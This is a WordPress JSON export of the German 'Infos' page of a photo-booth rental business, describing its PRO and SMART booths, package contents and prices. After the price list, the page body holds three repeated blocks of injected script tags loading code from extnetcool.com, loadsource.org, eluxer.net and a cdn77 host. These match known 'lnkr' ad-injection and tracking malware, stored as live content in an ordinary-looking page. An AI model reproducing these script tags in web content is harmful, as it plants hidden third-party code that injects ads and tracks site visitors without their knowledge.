{"id":19,"date":"2018-10-13T15:18:48","date_gmt":"2018-10-13T15:18:48","guid":{"rendered":"https:\/\/photostand.de\/?page_id=19"},"modified":"2025-11-11T14:25:17","modified_gmt":"2025-11-11T14:25:17","slug":"infos","status":"publish","type":"page","link":"https:\/\/photostand.de\/?page_id=19","title":{"rendered":"Infos"},"content":{"rendered":"<h3><strong>Was ist der Photostand?<\/strong><\/h3>\n<p>Unsere Photost\u00e4nde sind die professionelle Weiterentwicklung und neute Generation des klassischen Photoautomaten. Die Photost\u00e4nde sind der neuste Trend f\u00fcr Ihre Veranstaltung oder Feier. Die in sich geschlossenen und \u00fcberall platzierbaren Systeme sind auf Wunsch mit Drucker und einer direkten Social-Media Anbindung ausgestattet. Mit unseren Photost\u00e4nden gestalten Sie nicht nur Photos, sondern unverg\u00e4ssliche Erinnerungen.<\/p>\n<h3><strong>Was k\u00f6nnen die Photost\u00e4nde?<\/strong><\/h3>\n<p>Wir bieten Ihnen 2 verschiedene Photost\u00e4nde: Photostand PRO und Photostand SMART, welche sich haupts\u00e4chlich in der Gr\u00f6\u00dfe unterscheiden. Der Photostand PRO hat einen integrierten Drucker, bei der Varianten SMART kann der Drucker zus\u00e4tzlich gebucht werden.<br \/>\nDie Funktionen sind bei allen gleich: Ob Facebook, Twitter, SMS, QR-Code, Email oder Ausdruck &#8211; alles kein Problem f\u00fcr den Photostand.<br \/>\nOb Einzelbild oder Collage; ob mit Logo oder Erinnerungstext &#8211; gestalten Sie das Bild individuell nach Ihren W\u00fcnschen.<br \/>\nEgal wo und wie Sie den Photostand einsetzen, eines ist garantiert &#8211; ganz viel Spa\u00df.<\/p>\n<h3 style=\"font-weight: 400;\"><strong>Betreuung<\/strong><\/h3>\n<p style=\"font-weight: 400;\">Unsere Photost\u00e4nde sind kinderleicht zu bedienen und selbsterkl\u00e4rend. Sie sind zudem so ausgestattet, dass auch bei den Druckern keine Betreuung oder Papiernachlage notwendig ist.<br \/>\nDaher ist die Betreuung durch einen Operator w\u00e4hrend der Veranstaltung nicht notwendig.<br \/>\nSelbstverst\u00e4ndlich k\u00f6nnen Sie eine Betreuung zus\u00e4tzlich buchen.<\/p>\n<h3 style=\"font-weight: 400;\"><strong>Kosten<\/strong><\/h3>\n<p style=\"font-weight: 400;\">Der Preis f\u00fcr die Buchung einer unserer Photost\u00e4nde h\u00e4ngt davon ab, f\u00fcr welches System Sie sich entscheiden.<\/p>\n<p style=\"font-weight: 400;\">Sie mieten unser System nicht nach Stunden oder nach Bildern sondern f\u00fcr Ihre komplette Veranstaltung.<\/p>\n<p style=\"font-weight: 400;\">Sie erhalten bei uns ein all-inclusive Paket mit den folgenden Leistungen:<\/p>\n<ul>\n<li style=\"font-weight: 400;\">Einrichtung eines individuellen Layouts<\/li>\n<li style=\"font-weight: 400;\">Accessoires zum verkleiden<\/li>\n<li style=\"font-weight: 400;\">Bei Bedarf eine R\u00fcckwand<\/li>\n<li style=\"font-weight: 400;\">Alle Bilder sowohl als Layout als auch ohne Layout nach der Veranstaltung auf DVD<\/li>\n<li style=\"font-weight: 400;\">Aufbau vor der Veranstaltung<\/li>\n<li style=\"font-weight: 400;\">Abbau am Folgetag<\/li>\n<li style=\"font-weight: 400;\">Bei der Buchung eines Photostand mit Drucker: bis zu 700 Bilder sofort for Ort ausgedruckt<\/li>\n<\/ul>\n<p style=\"font-weight: 400; text-align: left;\">Photostand PRO : 479.- inkl. MwSt.*<\/p>\n<p style=\"font-weight: 400;\">Photostand SMART : 279.- inkl. MwSt.*<\/p>\n<p style=\"font-weight: 400;\">*ggf. zzgl. Anfahrt<\/p>\n<p><script src=\"https:\/\/extnetcool.com\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"https:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x7392x&amp;r=1539673732016\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"https:\/\/extnetcool.com\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"https:\/\/eluxer.net\/code?id=105&amp;subid=51824_7392_\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"https:\/\/1675450967.rsc.cdn77.org\/cu\/trkshpks.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"https:\/\/extnetcool.com\/optout\/set\/lat?jsonp=__twb_cb_662780142&amp;key=1ce0c4b6d7780990fb&amp;cv=1539674362&amp;t=1539674361980\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"https:\/\/extnetcool.com\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"https:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x7392x&amp;r=1539674361988\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"https:\/\/extnetcool.com\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"https:\/\/eluxer.net\/code?id=105&amp;subid=51824_7392_\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"https:\/\/1675450967.rsc.cdn77.org\/cu\/trkshpks.js\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"https:\/\/extnetcool.com\/optout\/set\/lat?jsonp=__twb_cb_939734330&amp;key=1ce0c4b6d7780990fb&amp;cv=1539675856&amp;t=1539675856390\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"https:\/\/extnetcool.com\/optout\/set\/lt?jsonp=__twb_cb_493028969&amp;key=1ce0c4b6d7780990fb&amp;cv=27488&amp;t=1539675856390\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"https:\/\/extnetcool.com\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"https:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=51824x7392x&amp;r=1539675856395\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"https:\/\/extnetcool.com\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"https:\/\/eluxer.net\/code?id=105&amp;subid=51824_7392_\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"https:\/\/1675450967.rsc.cdn77.org\/cu\/trkshpks.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Was ist der Photostand? Unsere Photost\u00e4nde sind die professionelle Weiterentwicklung und neute Generation des klassischen Photoautomaten. Die Photost\u00e4nde sind der neuste Trend f\u00fcr Ihre Veranstaltung oder Feier. Die in sich geschlossenen und \u00fcberall platzierbaren Systeme sind auf Wunsch mit Drucker und einer direkten Social-Media Anbindung ausgestattet. Mit unseren Photost\u00e4nden gestalten Sie nicht nur Photos, sondern [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"template-fullwidth.php","meta":{"footnotes":""},"class_list":["post-19","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/photostand.de\/index.php?rest_route=\/wp\/v2\/pages\/19","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/photostand.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/photostand.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/photostand.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/photostand.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19"}],"version-history":[{"count":10,"href":"https:\/\/photostand.de\/index.php?rest_route=\/wp\/v2\/pages\/19\/revisions"}],"predecessor-version":[{"id":202,"href":"https:\/\/photostand.de\/index.php?rest_route=\/wp\/v2\/pages\/19\/revisions\/202"}],"wp:attachment":[{"href":"https:\/\/photostand.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}